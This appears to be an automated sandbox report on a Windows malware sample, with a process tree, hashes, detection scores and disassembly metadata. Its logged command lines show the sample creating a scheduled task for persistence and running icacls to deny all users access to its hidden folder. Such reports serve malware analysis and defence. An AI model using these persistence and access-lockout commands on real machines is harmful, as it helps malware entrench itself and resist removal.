Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Ovwofzapxgm.vbs'
Imagebase:	0x30000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wa71myDkbQ.exe PID: 3188 Parent PID: 3192

General

Start time:	21:20:10
Start date:	10/06/2021
Path:	C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe
Imagebase:	0x7ff772bb0000
File size:	367616 bytes
MD5 hash:	C4050E6BDD335E319CA7B848D53B9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Izhwsiraoosvchost.exe PID: 3332 Parent PID: 5588

General

Start time:	21:20:11
Start date:	10/06/2021
Path:	C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe'
Imagebase:	0xe70000
File size:	238080 bytes
MD5 hash:	EEA980187EA08E02E70765195BB1E473
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 90%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 5008 Parent PID: 3332

General

Start time:	21:20:20
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
Imagebase:	0x1360000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5572 Parent PID: 5008

General

Start time:	21:20:21
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2900 Parent PID: 3332

General

Start time:	21:20:21
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'S-1-1-0:(R,REA,RA,RD)' 'S-1-5-7:(R,REA,RA,RD)'
Imagebase:	0x1360000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1856 Parent PID: 2900

General

Start time:	21:20:22
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2008 Parent PID: 3332

General

Start time:	21:20:22
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'SYSTEM:(R,REA,RA,RD)'
Imagebase:	0x1360000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 2916 Parent PID: 5008

General

Start time:	21:20:22
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
Imagebase:	0xef0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: icacls.exe PID: 5168 Parent PID: 2900

General

Start time:	21:20:23
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'S-1-1-0:(R,REA,RA,RD)' 'S-1-5-7:(R,REA,RA,RD)'
Imagebase:	0x980000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4336 Parent PID: 2008

General

Start time:	21:20:24
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5824 Parent PID: 3332

General

Start time:	21:20:24
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Administrators:(R,REA,RA,RD)'
Imagebase:	0x1360000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: AIKY.exe PID: 5592 Parent PID: 1104

General

Start time:	21:20:24
Start date:	10/06/2021
Path:	C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
Imagebase:	0xb30000
File size:	238080 bytes
MD5 hash:	EEA980187EA08E02E70765195BB1E473
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 90%, ReversingLabs

Chronological Activities

Analysis Process: icacls.exe PID: 5796 Parent PID: 2008

General

Start time:	21:20:24
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'SYSTEM:(R,REA,RA,RD)'
Imagebase:	0x980000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5300 Parent PID: 5824

General

Start time:	21:20:24
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 5956 Parent PID: 3332

General

Start time:	21:20:24
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Users:(R,REA,RA,RD)'
Imagebase:	0x1360000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: icacls.exe PID: 5948 Parent PID: 5824

General

Start time:	21:20:25
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Administrators:(R,REA,RA,RD)'
Imagebase:	0x980000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4060 Parent PID: 5956

General

Start time:	21:20:25
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 5648 Parent PID: 3332

General

Start time:	21:20:25
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'user:(R,REA,RA,RD)'
Imagebase:	0x1360000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: AIKY.exe PID: 5044 Parent PID: 1104

General

Start time:	21:20:25
Start date:	10/06/2021
Path:	C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
Imagebase:	0xb30000
File size:	238080 bytes
MD5 hash:	EEA980187EA08E02E70765195BB1E473
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: icacls.exe PID: 5144 Parent PID: 5956

General

Start time:	21:20:26
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Users:(R,REA,RA,RD)'
Imagebase:	0x980000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5724 Parent PID: 5648

General

Start time:	21:20:26
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: AIKY.exe PID: 244 Parent PID: 3332

General

Start time:	21:20:26
Start date:	10/06/2021
Path:	C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe'
Imagebase:	0xb30000
File size:	238080 bytes
MD5 hash:	EEA980187EA08E02E70765195BB1E473
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: icacls.exe PID: 5656 Parent PID: 5648

General

Start time:	21:20:27
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'user:(R,REA,RA,RD)'
Imagebase:	0x980000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: AIKY.exe PID: 5292 Parent PID: 3292

General

Start time:	21:20:34
Start date:	10/06/2021
Path:	C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe'
Imagebase:	0xb30000
File size:	238080 bytes
MD5 hash:	EEA980187EA08E02E70765195BB1E473
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: AIKY.exe PID: 5288 Parent PID: 3292

General

Start time:	21:20:42
Start date:	10/06/2021
Path:	C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe'
Imagebase:	0xb30000
File size:	238080 bytes
MD5 hash:	EEA980187EA08E02E70765195BB1E473
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5532 Parent PID: 5044

General

Start time:	21:20:44
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 928
Imagebase:	0x800000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: AIKY.exe PID: 5956 Parent PID: 3292

General

Start time:	21:20:50
Start date:	10/06/2021
Path:	C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe'
Imagebase:	0xb30000
File size:	238080 bytes
MD5 hash:	EEA980187EA08E02E70765195BB1E473
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: wa71myDkbQ.exe PID: 3192 Parent PID: 5664 wa71myDkbQ.exeCOMMON

Executed Functions

Function 00C14DF9, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 157libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C14EBD

Strings

8^Jl, xrefs: 00C14FB1

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: 8^Jl
API String ID: 2994545307-1013679636
Opcode ID: 6064db1e71f67323c12b266f48831838c4f77a8f2670ad6b963f7b000a9ed3fd
Instruction ID: fdcda8304b1e71ea24a48170c0f6b61e638148196d8d8992d6d2e74effddac45
Opcode Fuzzy Hash: 6064db1e71f67323c12b266f48831838c4f77a8f2670ad6b963f7b000a9ed3fd
Instruction Fuzzy Hash: 8751C1357041108FC758EBB8D454AAEB3E2BF8A714B1544A9D406CB7A1DF35DC82EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C13320, Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

`Il, xrefs: 00C1339D

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID: `Il
API String ID: 0-4271510599
Opcode ID: e69abe26302714c6099b4cc3a72a9f55707c5b30bc80cc589a654f6a571780dd
Instruction ID: e62f2cde29b2580fc31b2feb61804a156478c5197f36b3a0b754baaaa001921a
Opcode Fuzzy Hash: e69abe26302714c6099b4cc3a72a9f55707c5b30bc80cc589a654f6a571780dd
Instruction Fuzzy Hash: 20816832F111648FDB14DB69D880A9EB3A3AFC8714F1A8164E409DB769DF31ED419B90

Uniqueness

Uniqueness Score: -1.00%

Function 00C122C0, Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59647024502098cdfa5fff2035049efc3d46445ee5286ddf1f6e2c7b0a4a3697
Instruction ID: 41f92abca9c836d161d5f7ba579ec88d9ff44d42406c8a3d54bbfd2063e1f01d
Opcode Fuzzy Hash: 59647024502098cdfa5fff2035049efc3d46445ee5286ddf1f6e2c7b0a4a3697
Instruction Fuzzy Hash: C7129B38E146198FDB14DF69D880AAEB7F2FF8A305F14C569D016AB354DB30AA41DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00C122B0, Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffe48acf051f422ca61c9ee6e8c1904a73550d24e53a6cd86313f80ff90f4776
Instruction ID: d672534d6d2e2d24c39c3e8c4412ba1898b83cd85f80a1544fed729e2784e29e
Opcode Fuzzy Hash: ffe48acf051f422ca61c9ee6e8c1904a73550d24e53a6cd86313f80ff90f4776
Instruction Fuzzy Hash: ECA1AE34E106198FDB14DF7AD884AAEB7F2BFC9305F11C569D006AB354DB30AA468F91

Uniqueness

Uniqueness Score: -1.00%

Function 00C122FA, Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c52a0119bb47ba386664756ef2e765db7df352075eae86398b2d9fb2b6baae
Instruction ID: 93ae784eb1507c2431e3d5294911d6d45d268f8f1ca2e32ba92f90c6c733b6e8
Opcode Fuzzy Hash: 30c52a0119bb47ba386664756ef2e765db7df352075eae86398b2d9fb2b6baae
Instruction Fuzzy Hash: 5DA19E34A005198FDB14DB7AD884AAEB7F3BF89305F11C568E006AB354DB34AA469F91

Uniqueness

Uniqueness Score: -1.00%

Function 00C14360, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

xEl, xrefs: 00C146DF
xEl, xrefs: 00C14670

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID: xEl$xEl
API String ID: 0-1176660755
Opcode ID: 07023ae64870dc091ba0ba7c1af68fcd8a327f93b8267d57333a5af42c82a3e4
Instruction ID: cef55ce49abb7dba6cd2848bbc5dda49d1c386aafb202d2e877481674d31183c
Opcode Fuzzy Hash: 07023ae64870dc091ba0ba7c1af68fcd8a327f93b8267d57333a5af42c82a3e4
Instruction Fuzzy Hash: 7C71BA34A18219CBDB18DBB6C444BEDB6B5AB43305F50052AD0A2D73A0DB75CDC0FB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C14350, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

xEl, xrefs: 00C146DF
xEl, xrefs: 00C14670

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID: xEl$xEl
API String ID: 0-1176660755
Opcode ID: 147650d9a904804ca07b9d97dccf4bfe13ae70ecc9e43f301e33b423dec0489e
Instruction ID: 5534711de6472697110fa382e18f65a9cf6f28b98a1a3f3216bdf1af312950b3
Opcode Fuzzy Hash: 147650d9a904804ca07b9d97dccf4bfe13ae70ecc9e43f301e33b423dec0489e
Instruction Fuzzy Hash: 7861AD3491C219CBDB189BB6C444BF9B6B5AB43305F50052AD0A2963A0DB75CDD0FB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C143A7, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

xEl, xrefs: 00C146DF
xEl, xrefs: 00C14670

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID: xEl$xEl
API String ID: 0-1176660755
Opcode ID: 2009276d3d748c070a7fc542de74ae8b025ceb15234688be61807e7cec24632f
Instruction ID: dc659339470da4f8f5f8fe938ae628965631bfac580a969e9dc940779763811f
Opcode Fuzzy Hash: 2009276d3d748c070a7fc542de74ae8b025ceb15234688be61807e7cec24632f
Instruction Fuzzy Hash: C061AD38A1C11ACBDB1CDBB6D444BF9B2A1AB43305F540525D4A2D63A0DB35CED0FB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C143A1, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

xEl, xrefs: 00C146DF
xEl, xrefs: 00C14670

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID: xEl$xEl
API String ID: 0-1176660755
Opcode ID: 57f4533ae4aba6068eec598064161ca9f29fdf9b228b7109fefba16469d0ffbd
Instruction ID: 868f2feee648a1bc30916556bf2230f1c6abc0175778c4a835377dfdc1bbb13f
Opcode Fuzzy Hash: 57f4533ae4aba6068eec598064161ca9f29fdf9b228b7109fefba16469d0ffbd
Instruction Fuzzy Hash: 3551BF34A1C115CBDB1CDBB6D444BF9B2A1AB43306F540529D4A2D63A0DB35CDD0FB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C17DD4, Relevance: 2.0, APIs: 1, Instructions: 546COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4224b5183df4fb8e0b7a91688a5757f4cdd5c96b271d9426a2acc78df9939410
Instruction ID: 839526c78f6be517577f50daad7e509585388b189e785f3293c803c35906efbe
Opcode Fuzzy Hash: 4224b5183df4fb8e0b7a91688a5757f4cdd5c96b271d9426a2acc78df9939410
Instruction Fuzzy Hash: 7B41B6728093958FCB11CFA9C884ADEBFF0EF46310F05859ED054AB292D7749946CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C17E71, Relevance: 2.0, APIs: 1, Instructions: 498COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 00C1825B

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: c8aaf30caa084964538d5f8b08e94635dc02790de23d5357e07dce5c7b80c7bd
Instruction ID: 82ccbbab71914e36b828dd818a4e4f2402dfee88cc036e0c40faa6fd442aefac
Opcode Fuzzy Hash: c8aaf30caa084964538d5f8b08e94635dc02790de23d5357e07dce5c7b80c7bd
Instruction Fuzzy Hash: D5213875904249CFCB11CFAAC484BDEBBF0EF89320F14846AE468A7241D774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C164FC, Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C1673E

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f8486faa90136f72896021f963315044bcfda03b9e2962490c967b3ea94acf13
Instruction ID: ad8d1fa79bab89a6cde40d082530cbc1f3e2a6a48ea845c3520ea9883108312a
Opcode Fuzzy Hash: f8486faa90136f72896021f963315044bcfda03b9e2962490c967b3ea94acf13
Instruction Fuzzy Hash: 46A15B71D00219CFEB10CF68C841BEEBBB2BF49314F148569E819A7280DB759A86DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C16508, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C1673E

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 64c1e23a573e116b955850cade03a2a7b1d69e4cc2793b3553472d879aca91c1
Instruction ID: 1267e9e1fc062bd646c48eeb8f21e58da85349c236fe784e0b38fbbfbd555868
Opcode Fuzzy Hash: 64c1e23a573e116b955850cade03a2a7b1d69e4cc2793b3553472d879aca91c1
Instruction Fuzzy Hash: 9A915C71D00219CFEB10CF68C841BEEBBB2BF49314F148569E859A7280DB759A86DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C182B0, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 00C183B1

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: d9d5af3dcbd0b701e363c4e0b79ba2b997a2ed7b93e60fda5dc5865035175ad0
Instruction ID: 6aece93249fc4db7d42056c0db365bc3a4a7ff92c25228292c230870a8ddccdc
Opcode Fuzzy Hash: d9d5af3dcbd0b701e363c4e0b79ba2b997a2ed7b93e60fda5dc5865035175ad0
Instruction Fuzzy Hash: 5D412870D04258CFDB14CF99C894BDEBBB1BF49714F148129E869AB350CB74A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C182AB, Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 00C183B1

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 051128414767c7ccc295e163f6ff3bcd019704b11e8f70b8ea64798c233ee0a0
Instruction ID: 9b57ed14fb74d9bb5e07cd1b6942c64bc7922b211e6c9b4dc76f964df3e42ff0
Opcode Fuzzy Hash: 051128414767c7ccc295e163f6ff3bcd019704b11e8f70b8ea64798c233ee0a0
Instruction Fuzzy Hash: 7C415870D08248CFDB14CF99C894BDEBBB1BF49314F188129E869AB350CB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C121E0, Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,00C15419,00000000), ref: 00C156B9

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 14ec30c73dfcf9261248b7c0a9e325230c58d08a90547a6b18690963fcd6a3e0
Instruction ID: 38406393430a99e1305fe88d502c6f8e14e86306e3407a466e3a229c544d1b87
Opcode Fuzzy Hash: 14ec30c73dfcf9261248b7c0a9e325230c58d08a90547a6b18690963fcd6a3e0
Instruction Fuzzy Hash: BA2128B1D01619DFDB10CF9AD484BEEBBF4EB89320F14806AE818A7341D7749A41DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C15618, Relevance: 1.6, APIs: 1, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,00C15419,00000000), ref: 00C156B9

Memory Dump Source

Source File: 00000000.00000002.351479351.0000000000C10000.00000040.00000001.sdmp, Offset: 00C10000, based on PE: false

Similarity

API ID: CopyFile
String ID:
